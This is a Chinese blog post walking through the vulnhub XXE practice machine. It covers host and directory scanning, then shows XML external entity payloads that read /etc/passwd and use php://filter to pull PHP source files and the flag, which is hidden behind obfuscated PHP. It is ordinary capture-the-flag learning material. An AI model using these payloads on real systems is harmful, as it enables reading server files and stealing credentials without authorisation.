vulhubXXE靶机

于 2024-07-30 20:26:35 发布
阅读量356 收藏 1
点赞数 11
文章标签: 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75569982/article/details/140805893
版权

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254 kali本机ip

根据对比可知XXE的一个ip地址为192.168.134.134,并开放了80端口

在浏览器访问http://192.168.134.134

对网站进行目录和文件扫描

dirb http://192.168.134.134

发现有index.html和robots.txt

进入网站进行查询

发现存在用户登录的一个界面

进入用户登录界面

尝试登录并用Burpsuite抓包

通过抓包发现是XML数据提交

利用外部实体注入读取用户的账户文件

<!DOCTYPE r [<!ENTITY admin SYSTEM "file:///etc/passwd"> ]>
<root><name>&admin;</name><password>1</password></root>

继续通过php://filter读取admin.php的文件源码

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&admin;</name><password>admin</password></root>

进行base64解码

得到用户名和密码,经过分析可知密码是通过MD5格式加密的

得到账号密码administhebest,admin@123

进入http://192.168.134.134/xxe/admin.php进行登录

进入这个网站

进行抓包读取fiagmeout.php

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">
]>
<root><name>&admin;</name><password>admin</password></root>

进行base64解码

JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ

对得到的flag进行编码

得到flag.php

使用Burpsuite进行读取flag.php

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>

再进行编码

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);

放入php里面跑一下


 


 

baiyuanguang
关注
  • 11
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
PWN靶机环境 网络安全
05-23
PWN靶机环境
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
分布式系统常见软件架构模式
Ben的专栏
07-25 995
简而言之,有效管理数据和通信流对于构建健壮且可扩展的分布式系统至关重要。对等、API 网关、发布-订阅、请求-响应、事件溯源、ETL、批处理、流处理和编排等架构模式提供了有价值的解决方案,以应对系统设计和实现中的各种挑战。通过理解这些软件架构和分布式系统模式及其各自的优势和权衡,架构师和开发人员可以做出明智的决策,设计出满足其应用程序和用户不断变化的需求的系统。
消息队列-rabbitmq(生产者.消费者. 消息.可靠性)
2202_75352238的博客
07-28 561
在我们 生产者发送消息到交换机的时候,假如 我们发送到交换机 ,但是 队列没有收到消息,会返回ack,发送到交换机,然后发送到队列,消费者没有接收到消息返回ack,但是发送到交换机失败,会返回nack。死信交换机 ,都是假如一个定时消息过期了,或者发送延迟消息我们直接把该消息传递到我们绑定的死信交换机中,跟上文 消息发送失败了返回rejct之后,消息发送到err交换机是两种不同的策略。当一条消息发送失败的时候,消费者重新尝试消费消息,达到我们重试的次数之后,消费者返回reject,mq直接删除消息。
Spark RPC框架详解
小昌昌的博客
07-22 1145
SparkContext构造过程的重要一步,就是Driver、ApplicationMaster以及Executor之间的协调和通信过程,这是基于RPC进行的。这里的Spark RPC是基于Netty的通信过程,而Netty的通信其实是基于Reactor架构进行的,Reactor架构其实是基于Java NIO模型进行的。本文详细讲解了基于Netty 的 SparkRPC 框架的实现细节。
Kafka知识总结(选举机制+控制器+幂等性)
月伴飞鱼
07-27 946
其他Broker启动时也会在Zookeeper中创建临时节点,但是发现节点已经存在,所以它们会收到一个异常,意识到控制器已经存在,那么就会在Zookeeper中创建Watch对象,便于它们收到控制器变更的通知。他只能保证单分区上的幂等性,即一个幂等性Producer只能够保证某个topic的一个分区上不出现重复消息,无法实现多分区的幂等。控制器上保存了最全的集群元数据信息,其他所有 Broker 会定期接收控制器发来的元数据更新请求,从而更新其内存中的缓存数据。目前,当有新 Broker 启动后,它会在。
杭州东网约车管理再出行方面取得的显著成效
2301_81759256的博客
07-25 517
本次革新,沧穹科技首创将音频“室内北斗”应用于网约车智能导航,利用其信号的空间传播特性和信号传播时间或相位差的精确测量技术,实现网约车智能化服务中对车辆与乘客实时位置的精确追踪,从而确保从预约到乘车的全流程实现智能化、可视化、灵活化管理。同时,管理部门还利用大数据分析,对网约车运营情况进行实时监控和分析,及时发现问题并进行处理,确保了网约车服务的稳定性和可靠性。同时,管理部门还将持续关注行业动态和乘客需求变化,不断优化服务流程和提高服务质量,为广大市民和游客提供更加便捷、安全、舒适的出行体验。
基于 SASL/SCRAM 让 Kafka 实现动态授权认证
最新发布
zlt2000的博客
07-29 251
本文将从零开始部署ZooKeeper和Kafka并通过配置SASL/SCRAM和ACL(访问控制列表)来增强Kafka的安全性
压测实操--produce压测方案
07-24 969
作者:九月环境信息:操作系统centos7.9,kafka版本为hdp集群中的2.0版本。
自定义维度映射:Kylin Cube设计的高级玩法
2401_85763639的博客
07-25 619
维度的自定义映射是指用户可以根据实际需求,将数据源中的列映射到Cube的维度,而不是简单地使用一对一的映射。直接映射:将数据源中的列直接映射到Cube的维度。转换映射:对数据源中的列进行转换后,再映射到Cube的维度。组合映射:将多个数据源列组合成一个维度。在Kylin中,维度的自定义映射可以通过修改Cube的定义来实现。定义数据模型:在Hive中创建数据表,并定义好需要映射的列。编写Hive脚本:编写Hive SQL脚本来转换和组合数据源列。创建Cube。
AccessLog| 一款开源的日志分析系统
ClkLog的博客
07-26 458
系统采用Java语言、搭配OLAP数据库,涵盖基本web日志分析,同时提供性能分析,帮助高效运维
Kylin查询优化器深度解析:大数据查询性能的加速引擎
2401_85812053的博客
07-25 602
Apache Kylin是一个开源的分布式分析引擎,专为Hadoop和Spark平台上的大数据集提供快速的SQL查询能力。Kylin的核心优势之一是其强大的查询优化器,它能够智能地优化查询计划,显著提高查询性能。本文将深入探讨Kylin的查询优化器是如何工作的,并提供详细的解释和代码示例。Kylin的查询优化器是一个强大的组件,通过多阶段的优化流程和关键技术,显著提高了大数据集上的SQL查询性能。通过本文的学习,你应该能够理解Kylin查询优化器的工作原理,并能够应用这些知识来优化你的查询。
Hbase简介和快速入门
m0_37689903的博客
07-28 717
本文首先简单介绍了Hbase的定义,逻辑结构,物理存储结构;然后详细的介绍了Hbase的安装;最后简单介绍了Hbase的shell命令操作
国际金融入门:国际收支与平衡表解析
financeppl的博客
07-24 313
在全球化的经济体系中,国际金融已成为我们日常生活不可或缺的一部分。了解国际金融的基础知识,可以帮助我们更好地理解世界经济的动态和趋势。今天,我们将深入探讨国际收支及其平衡表,以及它们是如何影响国家经济。
ELK 日志分析系统
zheshijiuyue的博客
07-25 1030
了解ELk日志分析系统;安装,配置Elasticsearch日志收集;安装和配置Kibana进行日志查看。
每天一个数据分析题(四百五十)- 数据清洗
shiguangre的博客
07-26 222
内容涵盖Python,SQL,统计学,数据分析理论,深度学习,可视化,机器学习,Spark八个方向的专项练习题库,数据分析从业者刷题必备神器!数据在真正被使用前需进行必要的清洗,使脏数据变为可用数据。下列不属于“脏数据”的是()A. 重复数据。B. 错误数据。C. 交叉数据。D. 缺失数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值